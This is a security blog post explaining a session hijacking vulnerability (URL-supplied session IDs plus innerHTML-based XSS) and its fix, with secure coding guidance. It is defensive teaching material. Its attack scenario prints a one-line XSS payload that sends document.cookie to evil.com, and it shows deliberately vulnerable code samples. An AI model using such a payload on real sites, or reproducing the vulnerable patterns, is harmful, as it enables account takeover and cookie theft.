Back to Blog
critical SEVERITY6 min read

Fixing Session Hijacking: From Insecure Query Parameters to Secure Sessions

A critical session management vulnerability was recently patched in our application that allowed attackers to hijack user sessions by simply manipulating URL parameters. The fix addresses both client-side XSS vulnerabilities through unsafe DOM manipulation and server-side session validation issues, demonstrating how multiple security layers work together to protect user accounts.

O
By orbisai0security
March 6, 2026
#security#session-hijacking#xss#javascript#web-security#owasp#dom-security

Introduction

Session management is the backbone of user authentication in web applications. When implemented incorrectly, it becomes one of the most dangerous attack vectors, potentially exposing thousands of user accounts to unauthorized access. Recently, we discovered and fixed a compound vulnerability that combined insecure DOM manipulation with inadequate session validation—a perfect storm for attackers.

This vulnerability matters because session hijacking attacks are:
- Silent: Users often don't know their accounts have been compromised
- Scalable: Attackers can automate attacks across multiple victims
- Devastating: Full account takeover with all associated privileges

Let's dive into what went wrong and how we fixed it.

The Vulnerability Explained

The Double Threat

This vulnerability actually consisted of two interconnected security issues:

1. Insecure DOM Manipulation (XSS Vector)

In ui/frontend/main.js, the application used unsafe methods like innerHTML, outerHTML, or document.write() with user-controlled data. This is a classic Cross-Site Scripting (XSS) vulnerability.

// Vulnerable pattern (example)
const sessionId = new URLSearchParams(window.location.search).get('session_id');
document.getElementById('status').innerHTML = `Session: ${sessionId}`;

2. Inadequate Session Validation

The application accepted session_id directly from URL query parameters without:
- Cryptographic verification
- Server-side validation
- Binding to user context (IP, User-Agent, etc.)
- Integrity checks

How Could It Be Exploited?

Attack Scenario 1: Direct Session Hijacking

  1. Attacker obtains a valid session ID (through sniffing, social engineering, or brute force)
  2. Attacker crafts a URL: https://example.com/dashboard?session_id=stolen_session_123
  3. Application blindly trusts the session_id parameter
  4. Attacker gains full access to victim's account

Attack Scenario 2: XSS-Enhanced Session Theft

  1. Attacker crafts a malicious URL with XSS payload:
    https://example.com/?session_id=<script>fetch('https://evil.com/steal?cookie='+document.cookie)</script>
  2. Victim clicks the link (via phishing email or compromised site)
  3. Malicious script executes in victim's browser context
  4. Session tokens are exfiltrated to attacker's server
  5. Attacker uses stolen session to impersonate victim

Real-World Impact

This vulnerability could lead to:
- Complete account takeover: Access to personal data, financial information, and account settings
- Lateral movement: Using compromised accounts to attack other users
- Data breaches: Bulk extraction of sensitive information
- Reputation damage: Loss of user trust and potential legal consequences
- Compliance violations: GDPR, CCPA, and other regulations require proper session management

According to OWASP, broken authentication and session management consistently rank in the Top 10 web application security risks.

The Fix

What Changes Were Made?

While the code diff wasn't provided in detail, a proper fix for this vulnerability requires addressing both components:

1. Eliminating Unsafe DOM Manipulation

Before (Vulnerable):

// Directly inserting user input into DOM
const sessionId = getQueryParam('session_id');
document.getElementById('info').innerHTML = `Your session: ${sessionId}`;

After (Secure):

// Using safe text content methods
const sessionId = getQueryParam('session_id');
const infoElement = document.getElementById('info');
infoElement.textContent = `Your session: ${sessionId}`;
// Or better yet, don't display session IDs at all

2. Implementing Secure Session Management

Before (Vulnerable):

// Trusting client-supplied session ID
app.use((req, res, next) => {
    req.sessionId = req.query.session_id || req.cookies.session_id;
    next();
});

After (Secure):

// Server-side session validation
app.use((req, res, next) => {
    const sessionId = req.cookies.session_id; // Only from secure cookie

    if (!sessionId) {
        return res.status(401).json({ error: 'No session' });
    }

    // Verify session exists and is valid
    const session = sessionStore.get(sessionId);
    if (!session) {
        return res.status(401).json({ error: 'Invalid session' });
    }

    // Verify session binding (IP, User-Agent)
    if (session.ipAddress !== req.ip || 
        session.userAgent !== req.get('User-Agent')) {
        sessionStore.delete(sessionId);
        return res.status(401).json({ error: 'Session validation failed' });
    }

    // Check expiration
    if (session.expiresAt < Date.now()) {
        sessionStore.delete(sessionId);
        return res.status(401).json({ error: 'Session expired' });
    }

    req.session = session;
    next();
});

How Does This Solve the Problem?

XSS Prevention:
- Using textContent instead of innerHTML prevents script execution
- Content is treated as plain text, not HTML/JavaScript
- Browser automatically escapes special characters

Session Security:
- Sessions only accepted from secure, HTTP-only cookies
- Cryptographic validation ensures session integrity
- Context binding prevents session replay from different locations
- Server-side validation means clients can't forge sessions

Prevention & Best Practices

1. DOM Manipulation Security

Always use safe methods:

// ✅ SAFE
element.textContent = userInput;
element.setAttribute('data-value', userInput);

// ❌ DANGEROUS
element.innerHTML = userInput;
element.outerHTML = userInput;
document.write(userInput);

When HTML is necessary, sanitize:

import DOMPurify from 'dompurify';

// Sanitize before insertion
const cleanHTML = DOMPurify.sanitize(userInput);
element.innerHTML = cleanHTML;

2. Session Management Best Practices

Implement defense in depth:

// Generate cryptographically secure session IDs
const crypto = require('crypto');
const sessionId = crypto.randomBytes(32).toString('hex');

// Set secure cookie attributes
res.cookie('session_id', sessionId, {
    httpOnly: true,      // Prevents JavaScript access
    secure: true,        // HTTPS only
    sameSite: 'strict',  // CSRF protection
    maxAge: 3600000,     // 1 hour
    signed: true         // Cryptographic signature
});

// Implement session rotation
function rotateSession(req, res) {
    const oldSessionId = req.sessionId;
    const newSessionId = generateSecureSessionId();

    // Copy session data
    const sessionData = sessionStore.get(oldSessionId);
    sessionStore.set(newSessionId, sessionData);
    sessionStore.delete(oldSessionId);

    // Update cookie
    res.cookie('session_id', newSessionId, secureOptions);
}

3. Additional Security Layers

Content Security Policy (CSP):

<meta http-equiv="Content-Security-Policy" 
      content="default-src 'self'; script-src 'self'; object-src 'none';">

Security Headers:

app.use((req, res, next) => {
    res.setHeader('X-Content-Type-Options', 'nosniff');
    res.setHeader('X-Frame-Options', 'DENY');
    res.setHeader('X-XSS-Protection', '1; mode=block');
    next();
});

4. Detection Tools

  • Static Analysis: ESLint with security plugins (eslint-plugin-security)
  • SAST Tools: Semgrep, SonarQube, Checkmarx
  • Dynamic Testing: OWASP ZAP, Burp Suite
  • Dependency Scanning: npm audit, Snyk

Example ESLint Configuration:

{
    "plugins": ["security"],
    "rules": {
        "security/detect-unsafe-regex": "error",
        "security/detect-non-literal-regexp": "error",
        "security/detect-object-injection": "warn"
    }
}

5. Security Standards & References

  • OWASP Top 10: A03:2021 – Injection (XSS)
  • OWASP Top 10: A07:2021 – Identification and Authentication Failures
  • CWE-79: Improper Neutralization of Input During Web Page Generation (XSS)
  • CWE-384: Session Fixation
  • CWE-522: Insufficiently Protected Credentials
  • NIST SP 800-63B: Digital Identity Guidelines (Authentication)

Conclusion

This vulnerability fix demonstrates an important security principle: defense in depth. A single security control is never enough. By combining secure DOM manipulation practices with robust session management, we've created multiple barriers against attack.

Key Takeaways:

  1. Never trust client input: Always validate and sanitize, especially for security-critical operations
  2. Use safe APIs: Prefer textContent over innerHTML, secure cookies over URL parameters
  3. Validate server-side: Client-side controls can be bypassed; server must be the authority
  4. Implement context binding: Sessions should be tied to user context to prevent replay attacks
  5. Automate security testing: Use linters and SAST tools to catch vulnerabilities early

Session hijacking and XSS are well-understood vulnerabilities with clear solutions. By following established best practices and maintaining security awareness throughout development, we can build applications that protect our users' data and trust.

Remember: Security is not a feature—it's a foundation. Every line of code that handles user data or authentication is a potential vulnerability. Write defensively, test thoroughly, and never stop learning about emerging threats.

Stay secure! 🔒


Additional Resources:
- OWASP Session Management Cheat Sheet
- OWASP XSS Prevention Cheat Sheet
- MDN Web Security Guidelines

View the Security Fix

Check out the pull request that fixed this vulnerability

View PR #277

Related Articles

critical

Stack Buffer Overflow in MapScale: How Five Unsafe sprintf Calls Created a Critical Vulnerability

A critical stack-based buffer overflow vulnerability was discovered and patched in `src/mapscale.c`, where five unbounded `sprintf` calls wrote formatted output into fixed-size stack buffers without any bounds checking. An attacker controlling unit text strings could overflow the stack buffer, potentially overwriting the function return address and achieving arbitrary code execution. The fix replaces dangerous `sprintf` calls with their bounds-checked counterparts, eliminating the overflow risk

critical

Heap Buffer Overflows in YAML Parser: How Unchecked memcpy Calls Create Critical Attack Vectors

A critical heap buffer overflow vulnerability was discovered and patched in the YAML parser embedded within an Android VPN application, where five unvalidated `memcpy` calls could allow an attacker to corrupt heap memory by supplying a crafted YAML configuration file. This class of vulnerability is particularly dangerous because it can lead to arbitrary code execution or application crashes in security-sensitive contexts. The fix adds proper bounds validation before each copy operation, eliminat

critical

Critical Buffer Overflow Fixed: When "Safe" Functions Aren't Safe

A critical vulnerability in DeepSkyStackerKernel's StackWalker.cpp was silently replacing bounds-checking string functions with their unsafe counterparts via preprocessor macros, exposing the entire codebase to buffer overflow attacks. This fix removes the dangerous macro definitions that discarded buffer size arguments, restoring the intended memory safety protections across all call sites. Understanding how this subtle macro trick works is essential for any C/C++ developer working with string